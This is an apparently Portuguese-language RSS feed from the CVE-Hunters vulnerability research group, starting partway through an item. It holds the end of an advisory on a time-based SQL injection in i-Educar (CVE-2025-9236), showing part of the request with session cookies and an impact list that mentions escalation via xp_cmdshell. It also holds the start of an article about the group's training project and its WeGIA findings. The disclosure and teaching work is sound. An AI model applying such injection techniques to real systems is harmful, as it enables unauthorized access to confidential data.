class=&amp;#34;n&amp;#34;&amp;gt;data&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;.&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;cache&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;22&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;2&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;C&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;22&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;tab&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;-&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;flex&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;-&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;pages&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;-&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;raw&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;-&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;9&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;a0364b9e99bb480dd25e1f0284c8555&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;22&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;:&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;22&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;data&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;.&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;content&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;22&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;2&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;C&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;22&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;tab&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;-&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;flex&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;-&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;pages&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;-&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;e91e6348157868de9dd8b25c81aebfb9&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;22&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;:&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;22&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;data&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;.&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;security&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;22&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;2&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;C&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;22&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;tab&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;--&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;8&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;cc45760590da203c5fc3568ecbabd66&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;22&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;:&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;22&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;data&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;.&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;routes&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;22&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;2&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;C&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;22&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;tab&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;--&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;7&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;a2ac3477f8ad14aa750831441325a16&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;22&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;:&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;22&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;data&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;.&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;facebook&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;22&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;};&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;i_educar_session&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;hRnVO9PXmAH7dVAd7DsTeTgExwM6ccdtZZaCcpob&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;Upgrade&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;-&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;Insecure&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;-&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;Requests&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;:&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;1&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;Sec&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;-&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;Fetch&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;-&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;Dest&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;:&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;document&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;Sec&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;-&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;Fetch&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;-&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;Mode&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;:&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;navigate&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;Sec&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;-&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;Fetch&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;-&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;Site&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;:&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;same&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;-&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;origin&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;Sec&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;-&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;Fetch&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;-&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;User&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;:&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;?&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;1&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;Priority&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;:&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;u&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;0&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;,&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;i&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Este payload introduz um atraso de tempo, demonstrando a capacidade de executar consultas SQL arbitrárias.&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-9236/image.png&amp;#34;
	width=&amp;#34;1149&amp;#34;
	height=&amp;#34;1030&amp;#34;
	srcset=&amp;#34;/p/cve-2025-9236/image_hu_4ffda49109aad67b.png 480w, /p/cve-2025-9236/image_hu_2bdafcc06acaa448.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;111&amp;#34;
		data-flex-basis=&amp;#34;267px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Observe o atraso de tempo na resposta do servidor, indicando a execução bem-sucedida do payload SQL.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Acesso não autorizado a dados confidenciais (por exemplo, usuários, senhas, registros).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Enumeração de banco de dados (esquemas, tabelas, usuários, versões).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Escalonamento para RCE dependendo da configuração do banco de dados (por exemplo, xp_cmdshell, UDFs).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Comprometimento total do aplicativo se encadeado com outras vulnerabilidades.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Esse problema afeta todos os usuários e ambientes, pois não requer autenticação e pode ser acessado por meio de um ponto de extremidade público.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-9236.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-9236.md&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;encontrado-por&amp;#34;&amp;gt;Encontrado por:
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Wed, 20 Aug 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-Hunters, A Jornada de Aspirantes à Pesquisadores de Vulnerabilidades</title>
        <link>https://www.cvehunters.com/pt/articles/cve-hunters---the-journey-of-aspiring-vulnerability-researchers/</link>
        <guid>https://www.cvehunters.com/pt/articles/cve-hunters---the-journey-of-aspiring-vulnerability-researchers/</guid>
        <description>&amp;lt;h2 id=&amp;#34;introdução&amp;#34;&amp;gt;Introdução
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Na &amp;lt;b&amp;gt;&amp;lt;a href=&amp;#34;https://defcon.org/html/defcon-33/dc-33-index.html&amp;#34; target=&amp;#34;_blank&amp;#34;&amp;gt;#DEFCON33&amp;lt;/a&amp;gt;&amp;lt;/b&amp;gt;, uma das conferências de segurança mais prestigiadas do mundo, &amp;lt;b&amp;gt;&amp;lt;a href=&amp;#34;https://www.linkedin.com/in/nmmorette&amp;#34; target=&amp;#34;_blank&amp;#34;&amp;gt;Natan Morette&amp;lt;/a&amp;gt;&amp;lt;/b&amp;gt; apresentou o projeto &amp;lt;b&amp;gt;&amp;lt;a href=&amp;#34;https://www.cvehunters.com/&amp;#34; target=&amp;#34;_blank&amp;#34;&amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/b&amp;gt;, que representa uma mudança fundamental na forma como abordamos a educação em cybersecurity, transformando o dilema clássico da falta de experiência, em uma oportunidade concreta de aprendizado.&amp;lt;/br&amp;gt;&amp;lt;/br&amp;gt;Com 116 CVEs publicados, 170 vulnerabilidades descobertas e 20 membros ativos em menos de um ano, o b&amp;gt;&amp;lt;a href=&amp;#34;https://www.cvehunters.com/&amp;#34; target=&amp;#34;_blank&amp;#34;&amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/b&amp;gt; é um modelo replicável que está mudando vidas e melhorando a segurança de sistemas usados por milhões de pessoas.&amp;lt;/br&amp;gt;&amp;lt;/br&amp;gt;Durante suas aulas, &amp;lt;b&amp;gt;&amp;lt;a href=&amp;#34;https://www.linkedin.com/in/nmmorette&amp;#34; target=&amp;#34;_blank&amp;#34;&amp;gt;Natan&amp;lt;/a&amp;gt;&amp;lt;/b&amp;gt; se deparava constantemente com a mesma pergunta:&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;introdução&amp;#34;&amp;gt;Introdução
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Na &amp;lt;b&amp;gt;&amp;lt;a href=&amp;#34;https://defcon.org/html/defcon-33/dc-33-index.html&amp;#34; target=&amp;#34;_blank&amp;#34;&amp;gt;#DEFCON33&amp;lt;/a&amp;gt;&amp;lt;/b&amp;gt;, uma das conferências de segurança mais prestigiadas do mundo, &amp;lt;b&amp;gt;&amp;lt;a href=&amp;#34;https://www.linkedin.com/in/nmmorette&amp;#34; target=&amp;#34;_blank&amp;#34;&amp;gt;Natan Morette&amp;lt;/a&amp;gt;&amp;lt;/b&amp;gt; apresentou o projeto &amp;lt;b&amp;gt;&amp;lt;a href=&amp;#34;https://www.cvehunters.com/&amp;#34; target=&amp;#34;_blank&amp;#34;&amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/b&amp;gt;, que representa uma mudança fundamental na forma como abordamos a educação em cybersecurity, transformando o dilema clássico da falta de experiência, em uma oportunidade concreta de aprendizado.&amp;lt;/br&amp;gt;&amp;lt;/br&amp;gt;Com 116 CVEs publicados, 170 vulnerabilidades descobertas e 20 membros ativos em menos de um ano, o b&amp;gt;&amp;lt;a href=&amp;#34;https://www.cvehunters.com/&amp;#34; target=&amp;#34;_blank&amp;#34;&amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/b&amp;gt; é um modelo replicável que está mudando vidas e melhorando a segurança de sistemas usados por milhões de pessoas.&amp;lt;/br&amp;gt;&amp;lt;/br&amp;gt;Durante suas aulas, &amp;lt;b&amp;gt;&amp;lt;a href=&amp;#34;https://www.linkedin.com/in/nmmorette&amp;#34; target=&amp;#34;_blank&amp;#34;&amp;gt;Natan&amp;lt;/a&amp;gt;&amp;lt;/b&amp;gt; se deparava constantemente com a mesma pergunta:&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;amp;ldquo;Como obtenho experiência prática em segurança cibernética?&amp;amp;rdquo;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;o-problema-da-experiência-em-cibersegurança&amp;#34;&amp;gt;O Problema da Experiência em Cibersegurança
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A resposta incluía duas opções: &amp;lt;ul&amp;gt;&amp;lt;li&amp;gt;Participar de CTFs:&amp;lt;/li&amp;gt;&amp;lt;/ul&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Os CTFs criam um &amp;lt;i&amp;gt;&amp;#34;mindset de competição&amp;#34;&amp;lt;/i&amp;gt; diferente do mundo real, focando em resolver desafios artificiais, que não simula a complexidade de sistemas em produção.&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;&amp;lt;ul&amp;gt;&amp;lt;li&amp;gt;Estudar para certificações:&amp;lt;/li&amp;gt;&amp;lt;/ul&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;As certificações, por sua vez, são caras e se concentram na teoria, sem aplicação prática imediata.&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O mercado de trabalho perpetua esse paradoxo. Mesmo vagas &amp;lt;i&amp;gt;&amp;#34;junior&amp;#34;&amp;lt;/i&amp;gt; exigem experiência prévia, buscando profissionais com experiência em avaliação de vulnerabilidades, conhecimento prático de divulgação responsável, um portfólio demonstrável de descobertas de segurança e compreensão da relevância para o negócio.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;a-filosofia-cve-hunters&amp;#34;&amp;gt;A Filosofia CVE-Hunters
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Nasceu da premissa simples:&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;amp;ldquo;Cansamos de esperar por oportunidades, então criamos as nossas.&amp;amp;rdquo;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O diferencial está na seleção de projetos de código aberto, com base em &amp;lt;b&amp;gt;benefícios sociais reais&amp;lt;/b&amp;gt;, priorizando projetos utilizados por organizações que atendem populações vulneráveis.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;1ª-onda--projeto-wegia&amp;#34;&amp;gt;1ª Onda – Projeto WeGIA
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Em novembro de 2024, com apenas três pessoas (&amp;lt;b&amp;gt;&amp;lt;a href=&amp;#34;https://www.linkedin.com/in/nmmorette&amp;#34; target=&amp;#34;_blank&amp;#34;&amp;gt;Natan&amp;lt;/a&amp;gt;&amp;lt;/b&amp;gt; e dois estudantes), eles escolheram &amp;lt;b&amp;gt;&amp;lt;a href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA&amp;#34; target=&amp;#34;_blank&amp;#34;&amp;gt;#WeGIA&amp;lt;/a&amp;gt;&amp;lt;/b&amp;gt; como seu primeiro alvo. &amp;lt;b&amp;gt;&amp;lt;a href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA&amp;#34; target=&amp;#34;_blank&amp;#34;&amp;gt;WeGIA&amp;lt;/a&amp;gt;&amp;lt;/b&amp;gt; é uma plataforma brasileira de código aberto utilizada por programas sociais e ONGs, incluindo orfanatos, casas de repouso e centros de adoção. A escolha fez sentido: tinha relevância social direta, código acessível, desenvolvedores brasileiros facilitando a comunicação e era um sistema crítico para proteger dados de populações vulneráveis. A 1ª Onda resultou em &amp;lt;b&amp;gt;48 CVEs&amp;lt;/b&amp;gt; publicados, com uma distribuição impressionante:&amp;lt;/p&amp;gt;
&amp;lt;ul&amp;gt;
&amp;lt;li&amp;gt;34 Cross-Site Scripting (70,8%);&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;8 SQL Injection (16,7%);&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;2 Broken Access Control (4,2%);&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;1 Remote Code Execution (2,1%);&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;1 Open Redirect (2,1%);&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;1 Denial of Service (2,1%);&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;1 CSRF em ação sensível (2,1%).&amp;lt;/li&amp;gt;
&amp;lt;/ul&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Um destaque especial foi &amp;lt;b&amp;gt;&amp;lt;a href=&amp;#34;https://www.linkedin.com/in/elisangelasilvademendonca/&amp;#34; target=&amp;#34;_blank&amp;#34;&amp;gt;Elisangela Silva de Mendonça&amp;lt;/a&amp;gt;&amp;lt;/b&amp;gt;, aluna que descobriu sozinha &amp;lt;b&amp;gt;29 dos 48 CVEs (60% do total)&amp;lt;/b&amp;gt;. Sua trajetória exemplifica perfeitamente o potencial do projeto: ela começou como iniciante em pesquisa de vulnerabilidades, desenvolveu uma metodologia de análise sistemática, conquistou seu primeiro emprego em cibersegurança e hoje serve como referência para novos membros do grupo.&amp;lt;/br&amp;gt;&amp;lt;/br&amp;gt;Os impactos foram além do número de CVEs publicados, criando ondas de &amp;lt;b&amp;gt;mudança real&amp;lt;/b&amp;gt; na comunidade. Os dois primeiros alunos conquistaram seus primeiros empregos em cibersegurança, validando na prática que 